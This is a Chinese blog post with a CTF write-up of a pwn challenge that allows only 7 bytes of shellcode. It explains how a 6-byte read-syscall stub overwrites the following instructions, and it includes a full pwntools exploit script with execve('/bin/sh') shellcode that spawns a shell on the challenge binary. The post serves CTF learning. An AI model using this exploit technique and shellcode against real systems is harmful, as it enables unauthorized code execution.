<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">



<title>
  
    一个有趣的PWN 铁三云贵第三题
  
</title>

<meta name="description" content="前言五月份参加的铁三区域赛。当时自己还是一个pwn超级小白。连栈溢出都不会做。这道是里面分值最高的pwn题困扰了我很久，现在做出来很有意思。">
<meta name="keywords" content="CTF">
<meta property="og:type" content="article">
<meta property="og:title" content="一个有趣的PWN 铁三云贵第三题">
<meta property="og:url" content="http://yoursite.com/2018/08/23/一个有趣的PWN-铁三云贵第三题/index.html">
<meta property="og:site_name" content="pwndog&#39;s blog">
<meta property="og:description" content="前言五月份参加的铁三区域赛。当时自己还是一个pwn超级小白。连栈溢出都不会做。这道是里面分值最高的pwn题困扰了我很久，现在做出来很有意思。">
<meta property="og:locale" content="CN">
<meta property="og:image" content="http://yoursite.com/2018/08/23/一个有趣的PWN-铁三云贵第三题/1.png">
<meta property="og:image" content="http://yoursite.com/2018/08/23/一个有趣的PWN-铁三云贵第三题/2.png">
<meta property="og:image" content="http://yoursite.com/2018/08/23/一个有趣的PWN-铁三云贵第三题/3.png">
<meta property="og:image" content="http://yoursite.com/2018/08/23/一个有趣的PWN-铁三云贵第三题/4.png">
<meta property="og:image" content="http://yoursite.com/2018/08/23/一个有趣的PWN-铁三云贵第三题/5.png">
<meta property="og:updated_time" content="2018-08-23T06:14:33.460Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="一个有趣的PWN 铁三云贵第三题">
<meta name="twitter:description" content="前言五月份参加的铁三区域赛。当时自己还是一个pwn超级小白。连栈溢出都不会做。这道是里面分值最高的pwn题困扰了我很久，现在做出来很有意思。">
<meta name="twitter:image" content="http://yoursite.com/2018/08/23/一个有趣的PWN-铁三云贵第三题/1.png">


  <link rel="alternative" href="/atom.xml" title="pwndog&#39;s blog" type="application/atom+xml">



  <link rel="icon" href="/favicon.png">


<link rel="stylesheet" href="/perfect-scrollbar/css/perfect-scrollbar.min.css">
<link rel="stylesheet" href="/styles/main.css">






</head>
<body
  
    class="monochrome"
  
  >
  <div class="mobile-header">
  <button class="sidebar-toggle" type="button">
    <span class="icon-bar"></span>
    <span class="icon-bar"></span>
    <span class="icon-bar"></span>
  </button>
  <a class="title" href="/">pwndog&#39;s blog</a>
</div>

  <div class="main-container">
    <div class="sidebar">
  <div class="header">
    <h1 class="title"><a href="/">pwndog&#39;s blog</a></h1>
    
      <p class="subtitle">
        welcome
      </p>
    
    <div class="info">
      <div class="content">
        
          <div class="description">qq1015138407</div>
        
        
          <div class="author">zzm</div>
        
      </div>
      
        <div class="avatar">
          
            <a href="/about"><img src="https://cn.gravatar.com/avatar/35fef74d731255cd569c2c2b0b9e87e4?s=200"></a>
          
        </div>
      
    </div>
  </div>
  <div class="body">
    
      
        <ul class="nav">
          
            
              <li class="category-list-container">
                <a href="javascript:;">Category</a>
                <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/glibc源码阅读/">glibc源码阅读</a><span class="category-list-count">1</span></li></ul>
              </li>
            
          
            
              <li class="tag-list-container">
                <a href="javascript:;">Tag</a>
                <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/">CTF</a><span class="tag-list-count">11</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/GLIBC/">GLIBC</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/windows/">windows</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/堆/">堆</a><span class="tag-list-count">1</span></li></ul>
              </li>
            
          
            
              <li class="archive-list-container">
                <a href="javascript:;">Archive</a>
                <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/">2018</a><span class="archive-list-count">13</span></li></ul>
              </li>
            
          
        </ul>
      
        <ul class="nav">
          
            
              <li>
                <a href="/" title="Homepage">Homepage</a>
              </li>
            
          
            
              <li>
                <a href="/archives" title="By Year">By Year</a>
              </li>
            
          
        </ul>
      
        <ul class="nav">
          
            
              <li>
                <a href="https://github.com/denjones/hexo-theme-chan" title="Chan" target="_blank" rel="noopener">Chan</a>
              </li>
            
          
            
              <li>
                <a href="https://github.com/denjones" title="Github" target="_blank" rel="noopener">Github</a>
              </li>
            
          
            
              <li>
                <a href="/atom.xml" title="RSS">RSS</a>
              </li>
            
          
        </ul>
      
    
  </div>
</div>

    <div class="main-content">
      
        <div style="max-width: 1000px">
      
          <article id="post-一个有趣的PWN-铁三云贵第三题" class="article article-type-post">
  
    <h1 class="article-header">
      一个有趣的PWN 铁三云贵第三题
    </h1>
  
  

  <div class="article-info">
    <span class="article-date">
  2018-08-23
</span>

    

    
	<span class="article-tag tagcloud">
		<ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CTF/">CTF</a></li></ul>
	</span>


  </div>
  <div class="article-entry">
    <h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>五月份参加的铁三区域赛。当时自己还是一个pwn超级小白。连栈溢出都不会做。这道是里面分值最高的pwn题困扰了我很久，现在做出来很有意思。<br><a id="more"></a></p>
<h3 id="程序保护"><a href="#程序保护" class="headerlink" title="程序保护"></a>程序保护</h3><p><img src="/2018/08/23/一个有趣的PWN-铁三云贵第三题/1.png" alt="第一天排名"><br>全保护开启</p>
<h3 id="程序功能"><a href="#程序功能" class="headerlink" title="程序功能"></a>程序功能</h3><p><img src="/2018/08/23/一个有趣的PWN-铁三云贵第三题/2.png" alt="第一天排名"><br>程序首先mmap两处随机的地址空间，都具有可写权限。一处具有可执行权限<br><img src="/2018/08/23/一个有趣的PWN-铁三云贵第三题/3.png" alt="第一天排名"><br>之后要求我们输入7个字节的shellcode。放入刚才mmap的空间中。之后执行我们的shellcode。<br><img src="/2018/08/23/一个有趣的PWN-铁三云贵第三题/4.png" alt="第一天排名"><br>程序创造了这样一种环境。mmap出两片空间，一处保存代码，一处用于伪造栈使用。除了RSP,RIP其他所有寄存器清0。给我们任意代码执行权限，但只有7个字节。</p>
<h3 id="思路汇总"><a href="#思路汇总" class="headerlink" title="思路汇总"></a>思路汇总</h3><h4 id="1"><a href="#1" class="headerlink" title="1"></a>1</h4><p>最直接想到的肯定是execve（bin/sh）尝试，这里sh字符串会占2个字节，syscall两个字节，sh地址还不可知。大小完全不够。</p>
<h4 id="2"><a href="#2" class="headerlink" title="2"></a>2</h4><p>之后想到由于寄存器全部请0。可以直接使用0号调用read。我们可以使用的地址只有rsp一个寄存器。于是push rsp pop rsi push rsi push rdx syscall ret就可以向栈中写入shellcode并返回。。但是ret不到shellcode中去。因为我们没有shellcode的地址<br><img src="/2018/08/23/一个有趣的PWN-铁三云贵第三题/5.png" alt="第一天排名"></p>
<h4 id="3"><a href="#3" class="headerlink" title="3"></a>3</h4><p>经过对程序mmap过程的思考。发现若两次mmap的随机地址都已分配，则会造成两处内存空间相邻。且伪造栈的空间在上方！经过2我们可以实现对伪造栈空间的写入。如果两空间相邻我们可以覆盖到我们接下来要执行的指令！！<br>push rsp pop rsi push rsi push rdx syscall<br>这时候发现只需要6字节大小的shellcode。比条件还要小一字节2333333.<br>覆盖后我们可以无限写入完成利用。（伪造大小rdx时，rdx不能太大，于是我选择将 push rsi push rdx改为mov edx，esi，字节长度不变）</p>
<h3 id="脚本"><a href="#脚本" class="headerlink" title="脚本"></a>脚本</h3><pre><code class="python">p=process(<span class="string">'./seven'</span>)
p.readuntil(<span class="string">'Show me your shellcode:'</span>)
payload=chr(<span class="number">0x54</span>)+chr(<span class="number">0x5e</span>)+chr(<span class="number">0x8b</span>)+chr(<span class="number">0xd6</span>)+chr(<span class="number">0x0F</span>)+chr(<span class="number">0x05</span>)

p.writeline(payload)
z=[
<span class="number">0xB8</span>, <span class="number">0x3B</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0x8B</span>, <span class="number">0xFE</span>, <span class="number">0x48</span>, <span class="number">0x81</span>, <span class="number">0xC7</span>, <span class="number">0x4e</span>, <span class="number">0x0B</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x4b</span>, <span class="number">0x48</span>,<span class="number">0x33</span>, <span class="number">0xD2</span>, <span class="number">0x48</span>,
<span class="number">0x33</span>, <span class="number">0xF6</span>, <span class="number">0x0F</span>, <span class="number">0x05</span>, <span class="number">0x2F</span>, <span class="number">0x62</span>, <span class="number">0x69</span>, <span class="number">0x6E</span>, <span class="number">0x2F</span>, <span class="number">0x73</span>, <span class="number">0x68</span>, <span class="number">0x00</span>]
zz=<span class="string">''</span>
<span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,len(z)):
    zz+=chr(z[i])
payload=<span class="string">'b'</span>*<span class="number">0xb36</span>+zz
p.writeline(payload)
p.interactive()
</code></pre>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>史上最短shellcode。。。得益于它所给的环境。当时看着x86指令表好久无果。在昨天晚上偶然尝试直接找到了思路。开心</p>

  </div>
  <footer class="article-footer">
    
  <div class="cc">
    <a href="http://creativecommons.org/licenses/by-sa/4.0/deed.C" target="_blank" title="Attribution-ShareAlike">
      <img src="/images/cc/cc.png">
      
          <img src="/images/cc/by.png">
        
          <img src="/images/cc/sa.png">
      
      <span>
        This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.
      </span>
    </a>
  </div>


    

  </footer>
</article>







          <div class="main-footer">
  
    © 2018 pwndog&#39;s blog - Powered by <a href="http://hexo.io" target="_blank">Hexo</a> - Theme <a href="https://github.com/denjones/hexo-theme-chan" target="_blank">Chan</a>
  
</div>

      
        </div>
      
    </div>
  </div>
  <script src="//apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js"></script>

  <link rel="stylesheet" href="/PhotoSwipe/photoswipe.css">
  <link rel="stylesheet" href="/PhotoSwipe/default-skin/default-skin.css">

  <!-- Root element of PhotoSwipe. Must have class pswp. -->
  <div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe.
             It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

      <!-- Container that holds slides.
                PhotoSwipe keeps only 3 of them in the DOM to save memory.
                Don't modify these 3 pswp__item elements, data is added later on. -->
      <div class="pswp__container">
        <div class="pswp__item"></div>
        <div class="pswp__item"></div>
        <div class="pswp__item"></div>
      </div>

      <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
      <div class="pswp__ui pswp__ui--hidden">

        <div class="pswp__top-bar">

          <!--  Controls are self-explanatory. Order can be changed. -->

          <div class="pswp__counter"></div>

          <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

          <button class="pswp__button pswp__button--share" title="Share"></button>

          <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

          <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

          <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
          <!-- element will get class pswp__preloader--active when preloader is running -->
          <div class="pswp__preloader">
            <div class="pswp__preloader__icn">
              <div class="pswp__preloader__cut">
                <div class="pswp__preloader__donut"></div>
              </div>
            </div>
          </div>
        </div>

        <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
          <div class="pswp__share-tooltip"></div>
        </div>

        <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)"></button>

        <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)"></button>

        <div class="pswp__caption">
          <div class="pswp__caption__center"></div>
        </div>
      </div>
    </div>
  </div>

  <script src="/PhotoSwipe/photoswipe.js"></script>
  <script src="/PhotoSwipe/photoswipe-ui-default.js"></script>


<script src="/perfect-scrollbar/js/min/perfect-scrollbar.min.js"></script>
<script src="/scripts/main.js"></script>

</body>
</html>
